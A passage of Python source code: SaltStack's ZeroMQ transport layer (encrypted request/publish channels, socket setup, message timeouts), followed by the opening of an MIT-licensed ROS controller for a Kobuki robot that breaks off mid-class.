(for the return server): %s', self.master_uri) self.message_client = AsyncReqMessageClientPool(self.opts, args=(self.opts, self.master_uri,), kwargs={'io_loop': self._io_loop}) def __del__(self): ''' Since the message_client creates sockets and assigns them to the IOLoop we have to specifically destroy them, since we aren't the only ones with references to the FDs ''' if hasattr(self, 'message_client'): self.message_client.destroy() @property def master_uri(self): if 'master_uri' in self.opts: return self.opts['master_uri'] # if by chance master_uri is not there.. if 'master_ip' in self.opts: return _get_master_uri(self.opts['master_ip'], self.opts['master_port'], source_ip=self.opts.get('source_ip'), source_port=self.opts.get('source_ret_port')) # if we've reached here something is very abnormal raise SaltException('ReqChannel: missing master_uri/master_ip in self.opts') def _package_load(self, load): return { 'enc': self.crypt, 'load': load, } @tornado.gen.coroutine def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60): if not self.auth.authenticated: # Return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() # Return control to the caller. When send() completes, resume by populating ret with the Future.result ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) key = self.auth.get_keys() if 'key' not in ret: # Reauth in the case our key is deleted on the master side. yield self.auth.authenticate() ret = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) if HAS_M2: aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding) else: cipher = PKCS1_OAEP.new(key) aes = cipher.decrypt(ret['key']) pcrypt = salt.crypt.Crypticle(self.opts, aes) data = pcrypt.loads(ret[dictkey]) if six.PY3: data = salt.transport.frame.decode_embedded_strs(data) raise tornado.gen.Return(data) @tornado.gen.coroutine def _crypted_transfer(self, load, tries=3, timeout=60, raw=False): ''' Send a load across the wire, with encryption In case of authentication errors, try to renegotiate authentication and retry the method. Indeed, we can fail too early in case of a master restart during a minion state execution call :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing ''' @tornado.gen.coroutine def _do_transfer(): # Yield control to the caller. When send() completes, resume by populating data with the Future.result data = yield self.message_client.send( self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout, tries=tries, ) # we may not have always data # as for example for saltcall ret submission, this is a blind # communication, we do not subscribe to return events, we just # upload the results to the master if data: data = self.auth.crypticle.loads(data, raw) if six.PY3 and not raw: data = salt.transport.frame.decode_embedded_strs(data) raise tornado.gen.Return(data) if not self.auth.authenticated: # Return control back to the caller, resume when authentication succeeds yield self.auth.authenticate() try: # We did not get data back the first time. Retry. ret = yield _do_transfer() except salt.crypt.AuthenticationError: # If auth error, return control back to the caller, continue when authentication succeeds yield self.auth.authenticate() ret = yield _do_transfer() raise tornado.gen.Return(ret) @tornado.gen.coroutine def _uncrypted_transfer(self, load, tries=3, timeout=60): ''' Send a load across the wire in cleartext :param dict load: A load to send across the wire :param int tries: The number of times to make before failure :param int timeout: The number of seconds on a response before failing ''' ret = yield self.message_client.send( self._package_load(load), timeout=timeout, tries=tries, ) raise tornado.gen.Return(ret) @tornado.gen.coroutine def send(self, load, tries=3, timeout=60, raw=False): ''' Send a request, return a future which will complete when we send the message ''' if self.crypt == 'clear': ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout) else: ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw) raise tornado.gen.Return(ret) class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel): ''' A transport channel backed by ZeroMQ for a Salt Publisher to use to publish commands to connected minions ''' def __init__(self, opts, **kwargs): self.opts = opts self.ttype = 'zeromq' self.io_loop = kwargs.get('io_loop') if self.io_loop is None: install_zmq() self.io_loop = ZMQDefaultLoop.current() self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest() self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop) self.serial = salt.payload.Serial(self.opts) self.context = zmq.Context() self._socket = self.context.socket(zmq.SUB) if self.opts['zmq_filtering']: # TODO: constants file for "broadcast" self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast') self._socket.setsockopt( zmq.SUBSCRIBE, salt.utils.stringutils.to_bytes(self.hexid) ) else: self._socket.setsockopt(zmq.SUBSCRIBE, b'') self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id'])) # TODO: cleanup all the socket opts stuff if hasattr(zmq, 'TCP_KEEPALIVE'): self._socket.setsockopt( zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive'] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle'] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt'] ) self._socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl'] ) recon_delay = self.opts['recon_default'] if self.opts['recon_randomize']: recon_delay = randint(self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max']) log.debug( "Generated random reconnect delay between '%sms' and '%sms' (%s)", self.opts['recon_default'], self.opts['recon_default'] + self.opts['recon_max'], recon_delay ) log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay) self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay) if hasattr(zmq, 'RECONNECT_IVL_MAX'): log.debug( "Setting zmq_reconnect_ivl_max to '%sms'", self.opts['recon_default'] + self.opts['recon_max'] ) self._socket.setsockopt( zmq.RECONNECT_IVL_MAX, self.opts['recon_max'] ) if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses self._socket.setsockopt(zmq.IPV4ONLY, 0) if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']: self._monitor = ZeroMQSocketMonitor(self._socket) self._monitor.start_io_loop(self.io_loop) def destroy(self): if hasattr(self, '_monitor') and self._monitor is not None: self._monitor.stop() self._monitor = None if hasattr(self, '_stream'): if ZMQ_VERSION_INFO < (14, 3, 0): # stream.close() doesn't work properly on pyzmq < 14.3.0 self._stream.io_loop.remove_handler(self._stream.socket) self._stream.socket.close(0) else: self._stream.close(0) elif hasattr(self, '_socket'): self._socket.close(0) if hasattr(self, 'context') and self.context.closed is False: self.context.term() def __del__(self): self.destroy() # TODO: this is the time to see if we are connected, maybe use the req channel to guess? @tornado.gen.coroutine def connect(self): if not self.auth.authenticated: yield self.auth.authenticate() self.publish_port = self.auth.creds['publish_port'] log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub) self._socket.connect(self.master_pub) @property def master_pub(self): ''' Return the master publish port ''' return _get_master_uri(self.opts['master_ip'], self.publish_port, source_ip=self.opts.get('source_ip'), source_port=self.opts.get('source_publish_port')) @tornado.gen.coroutine def _decode_messages(self, messages): ''' Take the zmq messages, decrypt/decode them into a payload :param list messages: A list of messages to be decoded ''' messages_len = len(messages) # if it was one message, then its old style if messages_len == 1: payload = self.serial.loads(messages[0]) # 2 includes a header which says who should do it elif messages_len == 2: if messages[0] not in ('broadcast', self.hexid): log.debug('Publish received for not this minion: %s', messages[0]) raise tornado.gen.Return(None) payload = self.serial.loads(messages[1]) else: raise Exception(('Invalid number of messages ({0}) in zeromq pub' 'message from master').format(len(messages_len))) # Yield control back to the caller. When the payload has been decoded, assign # the decoded payload to 'ret' and resume operation ret = yield self._decode_payload(payload) raise tornado.gen.Return(ret) @property def stream(self): ''' Return the current zmqstream, creating one if necessary ''' if not hasattr(self, '_stream'): self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop) return self._stream def on_recv(self, callback): ''' Register a callback for received messages (that we didn't initiate) :param func callback: A function which should be called when data is received ''' if callback is None: return self.stream.on_recv(None) @tornado.gen.coroutine def wrap_callback(messages): payload = yield self._decode_messages(messages) if payload is not None: callback(payload) return self.stream.on_recv(wrap_callback) class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel): def __init__(self, opts): salt.transport.server.ReqServerChannel.__init__(self, opts) self._closing = False def zmq_device(self): ''' Multiprocessing target for the zmq queue device ''' self.__setup_signals() salt.utils.process.appendproctitle('MWorkerQueue') self.context = zmq.Context(self.opts['worker_threads']) # Prepare the zeromq sockets self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts) self.clients = self.context.socket(zmq.ROUTER) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses self.clients.setsockopt(zmq.IPV4ONLY, 0) self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000)) self._start_zmq_monitor() self.workers = self.context.socket(zmq.DEALER) if self.opts.get('ipc_mode', '') == 'tcp': self.w_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_workers', 4515) ) else: self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Setting up the master communication server') self.clients.bind(self.uri) self.workers.bind(self.w_uri) while True: if self.clients.closed or self.workers.closed: break try: zmq.device(zmq.QUEUE, self.clients, self.workers) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except (KeyboardInterrupt, SystemExit): break def close(self): ''' Cleanly shutdown the router socket ''' if self._closing: return log.info('MWorkerQueue under PID %s is closing', os.getpid()) self._closing = True # pylint: disable=E0203 if getattr(self, '_monitor', None) is not None: self._monitor.stop() self._monitor = None if getattr(self, '_w_monitor', None) is not None: self._w_monitor.stop() self._w_monitor = None if hasattr(self, 'clients') and self.clients.closed is False: self.clients.close() if hasattr(self, 'workers') and self.workers.closed is False: self.workers.close() if hasattr(self, 'stream'): self.stream.close() if hasattr(self, '_socket') and self._socket.closed is False: self._socket.close() if hasattr(self, 'context') and self.context.closed is False: self.context.term() # pylint: enable=E0203 def pre_fork(self, process_manager): ''' Pre-fork we need to create the zmq router device :param func process_manager: An instance of salt.utils.process.ProcessManager ''' salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager) process_manager.add_process(self.zmq_device) def _start_zmq_monitor(self): ''' Starts ZMQ monitor for debugging purposes. :return: ''' # Socket monitor shall be used the only for debug # purposes so using threading doesn't look too bad here if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']: log.debug('Starting ZMQ monitor') import threading self._w_monitor = ZeroMQSocketMonitor(self._socket) threading.Thread(target=self._w_monitor.start_poll).start() log.debug('ZMQ monitor has been started started') def post_fork(self, payload_handler, io_loop): ''' After forking we need to create all of the local sockets to listen to the router :param func payload_handler: A function to called to handle incoming payloads as they are picked up off the wire :param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling ''' self.payload_handler = payload_handler self.io_loop = io_loop self.context = zmq.Context(1) self._socket = self.context.socket(zmq.REP) self._start_zmq_monitor() if self.opts.get('ipc_mode', '') == 'tcp': self.w_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_workers', 4515) ) else: self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Worker binding to socket %s', self.w_uri) self._socket.connect(self.w_uri) salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop) self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop) self.stream.on_recv_stream(self.handle_message) @tornado.gen.coroutine def handle_message(self, stream, payload): ''' Handle incoming messages from underlying TCP streams :stream ZMQStream stream: A ZeroMQ stream. See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html :param dict payload: A payload to process ''' try: payload = self.serial.loads(payload[0]) payload = self._decode_payload(payload) except Exception as exc: exc_type = type(exc).__name__ if exc_type == 'AuthenticationError': log.debug( 'Minion failed to auth to master. Since the payload is ' 'encrypted, it is not known which minion failed to ' 'authenticate. It is likely that this is a transient ' 'failure due to the master rotating its public key.' ) else: log.error('Bad load from minion: %s: %s', exc_type, exc) stream.send(self.serial.dumps('bad load')) raise tornado.gen.Return() # TODO helper functions to normalize payload? if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict): log.error('payload and load must be a dict. Payload was: %s and load was %s', payload, payload.get('load')) stream.send(self.serial.dumps('payload and load must be a dict')) raise tornado.gen.Return() try: id_ = payload['load'].get('id', '') if str('\0') in id_: log.error('Payload contains an id with a null byte: %s', payload) stream.send(self.serial.dumps('bad load: id contains a null byte')) raise tornado.gen.Return() except TypeError: log.error('Payload contains non-string id: %s', payload) stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_))) raise tornado.gen.Return() # intercept the "_auth" commands, since the main daemon shouldn't know # anything about our key auth if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth': stream.send(self.serial.dumps(self._auth(payload['load']))) raise tornado.gen.Return() # TODO: test try: # Take the payload_handler function that was registered when we created the channel # and call it, returning control to the caller until it completes ret, req_opts = yield self.payload_handler(payload) except Exception as e: # always attempt to return an error to the minion stream.send('Some exception handling minion payload') log.error('Some exception handling a payload from minion', exc_info=True) raise tornado.gen.Return() req_fun = req_opts.get('fun', 'send') if req_fun == 'send_clear': stream.send(self.serial.dumps(ret)) elif req_fun == 'send': stream.send(self.serial.dumps(self.crypticle.dumps(ret))) elif req_fun == 'send_private': stream.send(self.serial.dumps(self._encrypt_private(ret, req_opts['key'], req_opts['tgt'], ))) else: log.error('Unknown req_fun %s', req_fun) # always attempt to return an error to the minion stream.send('Server-side exception handling payload') raise tornado.gen.Return() def __setup_signals(self): signal.signal(signal.SIGINT, self._handle_signals) signal.signal(signal.SIGTERM, self._handle_signals) def _handle_signals(self, signum, sigframe): msg = '{0} received a '.format(self.__class__.__name__) if signum == signal.SIGINT: msg += 'SIGINT' elif signum == signal.SIGTERM: msg += 'SIGTERM' msg += '. Exiting' log.debug(msg) self.close() sys.exit(salt.defaults.exitcodes.EX_OK) def _set_tcp_keepalive(zmq_socket, opts): ''' Ensure that TCP keepalives are set as specified in "opts". Warning: Failure to set TCP keepalives on the salt-master can result in not detecting the loss of a minion when the connection is lost or when it's host has been terminated without first closing the socket. Salt's Presence System depends on this connection status to know if a minion is "present". Warning: Failure to set TCP keepalives on minions can result in frequent or unexpected disconnects! ''' if hasattr(zmq, 'TCP_KEEPALIVE') and opts: if 'tcp_keepalive' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE, opts['tcp_keepalive'] ) if 'tcp_keepalive_idle' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle'] ) if 'tcp_keepalive_cnt' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt'] ) if 'tcp_keepalive_intvl' in opts: zmq_socket.setsockopt( zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl'] ) class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel): ''' Encapsulate synchronous operations for a publisher channel ''' _sock_data = threading.local() def __init__(self, opts): self.opts = opts self.serial = salt.payload.Serial(self.opts) # TODO: in init? self.ckminions = salt.utils.minions.CkMinions(self.opts) def connect(self): return tornado.gen.sleep(5) def _publish_daemon(self, log_queue=None): ''' Bind to the interface specified in the configuration file ''' salt.utils.process.appendproctitle(self.__class__.__name__) if log_queue: salt.log.setup.set_multiprocessing_logging_queue(log_queue) salt.log.setup.setup_multiprocessing_logging(log_queue) # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) _set_tcp_keepalive(pub_sock, self.opts) # if 2.1 >= zmq < 3.0, we only have one HWM setting try: pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000)) # in zmq >= 3.0, there are separate send and receive HWM settings except AttributeError: # Set the High Water Marks. For more information on HWM, see: # http://api.zeromq.org/4-1:zmq-setsockopt pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000)) pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000)) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses pub_sock.setsockopt(zmq.IPV4ONLY, 0) pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000)) pub_sock.setsockopt(zmq.LINGER, -1) pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) pull_sock.setsockopt(zmq.LINGER, -1) if self.opts.get('ipc_mode', '') == 'tcp': pull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_publish_pull', 4514) ) else: pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) salt.utils.zeromq.check_ipc_path_max_len(pull_uri) # Start the minion command publisher log.info('Starting the Salt Publisher on %s', pub_uri) pub_sock.bind(pub_uri) # Securely create socket log.info('Starting the Salt Puller on %s', pull_uri) with salt.utils.files.set_umask(0o177): pull_sock.bind(pull_uri) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: log.debug('Publish daemon getting data from puller %s', pull_uri) package = pull_sock.recv() log.debug('Publish daemon received payload. size=%d', len(package)) unpacked_package = salt.payload.unpackage(package) if six.PY3: unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package) payload = unpacked_package['payload'] log.trace('Accepted unpacked package from puller') if self.opts['zmq_filtering']: # if you have a specific topic list, use that if 'topic_lst' in unpacked_package: for topic in unpacked_package['topic_lst']: log.trace('Sending filtered data over publisher %s', pub_uri) # zmq filters are substring match, hash the topic # to avoid collisions htopic = hashlib.sha1(topic).hexdigest() pub_sock.send(htopic, flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Filtered data has been sent') # otherwise its a broadcast else: # TODO: constants file for "broadcast" log.trace('Sending broadcasted data over publisher %s', pub_uri) pub_sock.send('broadcast', flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Broadcasted data has been sent') else: log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri) pub_sock.send(payload) log.trace('Unfiltered data has been sent') except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: log.trace('Publish daemon caught Keyboard interupt, tearing down') # Cleanly close the sockets if we're shutting down if pub_sock.closed is False: pub_sock.close() if pull_sock.closed is False: pull_sock.close() if context.closed is False: context.term() def pre_fork(self, process_manager, kwargs=None): ''' Do anything necessary pre-fork. Since this is on the master side this will primarily be used to create IPC channels and create our daemon process to do the actual publishing :param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager ''' process_manager.add_process(self._publish_daemon, kwargs=kwargs) @property def pub_sock(self): ''' This thread's zmq publisher socket. This socket is stored on the class so that multiple instantiations in the same thread will re-use a single zmq socket. ''' try: return self._sock_data.sock except AttributeError: pass def pub_connect(self): ''' Create and connect this thread's zmq socket. If a publisher socket already exists "pub_close" is called before creating and connecting a new socket. ''' if self.pub_sock: self.pub_close() ctx = zmq.Context.instance() self._sock_data.sock = ctx.socket(zmq.PUSH) self.pub_sock.setsockopt(zmq.LINGER, -1) if self.opts.get('ipc_mode', '') == 'tcp': pull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_publish_pull', 4514) ) else: pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) log.debug("Connecting to pub server: %s", pull_uri) self.pub_sock.connect(pull_uri) return self._sock_data.sock def pub_close(self): ''' Disconnect an existing publisher socket and remove it from the local thread's cache. ''' if hasattr(self._sock_data, 'sock'): self._sock_data.sock.close() delattr(self._sock_data, 'sock') def publish(self, load): ''' Publish "load" to minions. This send the load to the publisher daemon process with does the actual sending to minions. :param dict load: A load to be sent across the wire to minions ''' payload = {'enc': 'aes'} crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value) payload['load'] = crypticle.dumps(load) if self.opts['sign_pub_messages']: master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem') log.debug("Signing data packet") payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load']) int_payload = {'payload': self.serial.dumps(payload)} # add some targeting stuff for lists only (for now) if load['tgt_type'] == 'list': int_payload['topic_lst'] = load['tgt'] # If zmq_filtering is enabled, target matching has to happen master side match_targets = ["pcre", "glob", "list"] if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets: # Fetch a list of minions that match _res = self.ckminions.check_minions(load['tgt'], tgt_type=load['tgt_type']) match_ids = _res['minions'] log.debug("Publish Side Match: %s", match_ids) # Send list of miions thru so zmq can target them int_payload['topic_lst'] = match_ids payload = self.serial.dumps(int_payload) log.debug( 'Sending payload to publish daemon. jid=%s size=%d', load.get('jid', None), len(payload), ) if not self.pub_sock: self.pub_connect() self.pub_sock.send(payload) log.debug('Sent payload to publish daemon.') class AsyncReqMessageClientPool(salt.transport.MessageClientPool): ''' Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket. ''' def __init__(self, opts, args=None, kwargs=None): super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs) def __del__(self): self.destroy() def destroy(self): for message_client in self.message_clients: message_client.destroy() self.message_clients = [] def send(self, *args, **kwargs): message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue)) return message_clients[0].send(*args, **kwargs) # TODO: unit tests! class AsyncReqMessageClient(object): ''' This class wraps the underlying zeromq REQ socket and gives a future-based interface to sending and recieving messages. This works around the primary limitation of serialized send/recv on the underlying socket by queueing the message sends in this class. In the future if we decide to attempt to multiplex we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial ''' def __init__(self, opts, addr, linger=0, io_loop=None): ''' Create an asynchronous message client :param dict opts: The salt opts dictionary :param str addr: The interface IP address to bind to :param int linger: The number of seconds to linger on a ZMQ socket. See http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER] :param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop] ''' self.opts = opts self.addr = addr self.linger = linger if io_loop is None: install_zmq() ZMQDefaultLoop.current() else: self.io_loop = io_loop self.serial = salt.payload.Serial(self.opts) self.context = zmq.Context() # wire up sockets self._init_socket() self.send_queue = [] # mapping of message -> future self.send_future_map = {} self.send_timeout_map = {} # message -> timeout # TODO: timeout all in-flight sessions, or error def destroy(self): if hasattr(self, 'stream') and self.stream is not None: if ZMQ_VERSION_INFO < (14, 3, 0): # stream.close() doesn't work properly on pyzmq < 14.3.0 if self.stream.socket: self.stream.socket.close() self.stream.io_loop.remove_handler(self.stream.socket) # set this to None, more hacks for messed up pyzmq self.stream.socket = None self.socket.close() else: self.stream.close() self.socket = None self.stream = None if self.context.closed is False: self.context.term() def __del__(self): self.destroy() def _init_socket(self): if hasattr(self, 'stream'): self.stream.close() # pylint: disable=E0203 self.socket.close() # pylint: disable=E0203 del self.stream del self.socket self.socket = self.context.socket(zmq.REQ) # socket options if hasattr(zmq, 'RECONNECT_IVL_MAX'): self.socket.setsockopt( zmq.RECONNECT_IVL_MAX, 5000 ) _set_tcp_keepalive(self.socket, self.opts) if self.addr.startswith('tcp://['): # Hint PF type if bracket enclosed IPv6 address if hasattr(zmq, 'IPV6'): self.socket.setsockopt(zmq.IPV6, 1) elif hasattr(zmq, 'IPV4ONLY'): self.socket.setsockopt(zmq.IPV4ONLY, 0) self.socket.linger = self.linger log.debug('Trying to connect to: %s', self.addr) self.socket.connect(self.addr) self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop) @tornado.gen.coroutine def _internal_send_recv(self): while len(self.send_queue) > 0: message = self.send_queue[0] future = self.send_future_map.get(message, None) if future is None: # Timedout del self.send_queue[0] continue # send def mark_future(msg): if not future.done(): data = self.serial.loads(msg[0]) future.set_result(data) self.stream.on_recv(mark_future) self.stream.send(message) try: ret = yield future except Exception as err: # pylint: disable=W0702 log.debug('Re-init ZMQ socket: %s', err) self._init_socket() # re-init the zmq socket (no other way in zmq) del self.send_queue[0] continue del self.send_queue[0] self.send_future_map.pop(message, None) self.remove_message_timeout(message) def remove_message_timeout(self, message): if message not in self.send_timeout_map: return timeout = self.send_timeout_map.pop(message, None) if timeout is not None: # Hasn't been already timedout self.io_loop.remove_timeout(timeout) def timeout_message(self, message): ''' Handle a message timeout by removing it from the sending queue and informing the caller :raises: SaltReqTimeoutError ''' future = self.send_future_map.pop(message, None) # In a race condition the message might have been sent by the time # we're timing it out. Make sure the future is not None if future is not None: del self.send_timeout_map[message] if future.attempts < future.tries: future.attempts += 1 log.debug('SaltReqTimeoutError, retrying. (%s/%s)', future.attempts, future.tries) self.send( message, timeout=future.timeout, tries=future.tries, future=future, ) else: future.set_exception(SaltReqTimeoutError('Message timed out')) def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False): ''' Return a future which will be completed when the message has a response ''' if future is None: future = tornado.concurrent.Future() future.tries = tries future.attempts = 0 future.timeout = timeout # if a future wasn't passed in, we need to serialize the message message = self.serial.dumps(message) if callback is not None: def handle_future(future): response = future.result() self.io_loop.add_callback(callback, response) future.add_done_callback(handle_future) # Add this future to the mapping self.send_future_map[message] = future if self.opts.get('detect_mode') is True: timeout = 1 if timeout is not None: send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message) self.send_timeout_map[message] = send_timeout if len(self.send_queue) == 0: self.io_loop.spawn_callback(self._internal_send_recv) self.send_queue.append(message) return future class ZeroMQSocketMonitor(object): __EVENT_MAP = None def __init__(self, socket): ''' Create ZMQ monitor sockets More information: http://api.zeromq.org/4-0:zmq-socket-monitor ''' self._socket = socket self._monitor_socket = self._socket.get_monitor_socket() self._monitor_stream = None def start_io_loop(self, io_loop): log.trace("Event monitor start!") self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop) self._monitor_stream.on_recv(self.monitor_callback) def start_poll(self): log.trace("Event monitor start!") try: while self._monitor_socket is not None and self._monitor_socket.poll(): msg = self._monitor_socket.recv_multipart() self.monitor_callback(msg) except (AttributeError, zmq.error.ContextTerminated): # We cannot log here because we'll get an interrupted system call in trying # to flush the logging buffer as we terminate pass @property def event_map(self): if ZeroMQSocketMonitor.__EVENT_MAP is None: event_map = {} for name in dir(zmq): if name.startswith('EVENT_'): value = getattr(zmq, name) event_map[value] = name ZeroMQSocketMonitor.__EVENT_MAP = event_map return ZeroMQSocketMonitor.__EVENT_MAP def monitor_callback(self, msg): evt = zmq.utils.monitor.parse_monitor_message(msg) evt['description'] = self.event_map[evt['event']] log.debug("ZeroMQ event: %s", evt) if evt['event'] == zmq.EVENT_MONITOR_STOPPED: self.stop() def stop(self): if self._socket is None: return self._socket.disable_monitor() self._socket = None self._monitor_socket = None if self._monitor_stream is not None: self._monitor_stream.close() self._monitor_stream = None log.trace("Event monitor done!")
programmable.py
#Copyright (c) 2017 Andre Santos # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in #all copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #THE SOFTWARE. from collections import namedtuple from math import pi, sqrt from threading import Thread, Lock import rospy from geometry_msgs.msg import Twist from kobuki_msgs.msg import BumperEvent from nav_msgs.msg import Odometry from tf.transformations import euler_from_quaternion PI2 = 2 * pi LINEAR = 0.2 # m/s ANGULAR = pi/6 # rad/s def angle_distance(alpha, beta): d = alpha - beta s = 1 if (d >= 0.0 and d <= pi) or (d <= -pi and d >= -PI2) else -1 d = abs(d) % PI2 r = PI2 - d if d > pi else d return r * s ############################################################################### # Robot State ############################################################################### State = namedtuple("State", ["translation", "rotation", "bump_center", "bump_left", "bump_right"]) class Robot(object): def __init__(self): self.translation = 0.0 self.rotation = 0.0 self.bump_left = False self.bump_right = False self.bump_center = False self.x = 0.0 self.y = 0.0 self.a = 0.0 self.lock = Lock() # Thread: subscriber def set_odometry(self, x, y, a): with self.lock: if not (self.bump_center or self.bump_left or self.bump_right): self.translation += sqrt((x - self.x)**2 + (y - self.y)**2) self.rotation += abs(angle_distance(a, self.a)) self.x = x self.y = y self.a = a # Thread: subscriber def set_bumper(self, center, left, right): with self.lock: if center: self.bump_center = True if left: self.bump_left = True if right: self.bump_right = True # Thread: publisher def get_state(self): with self.lock: state = State(self.translation, self.rotation, self.bump_center, self.bump_left, self.bump_right) self.translation = 0.0 self.rotation = 0.0 self.bump_center = False self.bump_left = False self.bump_right = False return state ############################################################################### # Publisher ############################################################################### class Publisher(object): def __init__(self, robot, callbacks): self.robot = robot self.to_walk = 0.0 self.to_rotate = 0.0 self.change_cmd = 0 self.commands = [] self.contador = 0 self.thread = None self.twist = None self.shutdown = False self.stop_msg = Twist() self.stop_msg.linear.x = 0 self.stop_msg.linear.y = 0 self.stop_msg.linear.z = 0 self.stop_msg.angular.x = 0 self.stop_msg.angular.y = 0 self.stop_msg.angular.z = 0 self.init = callbacks.get("init") or self.skip self.bump_center = 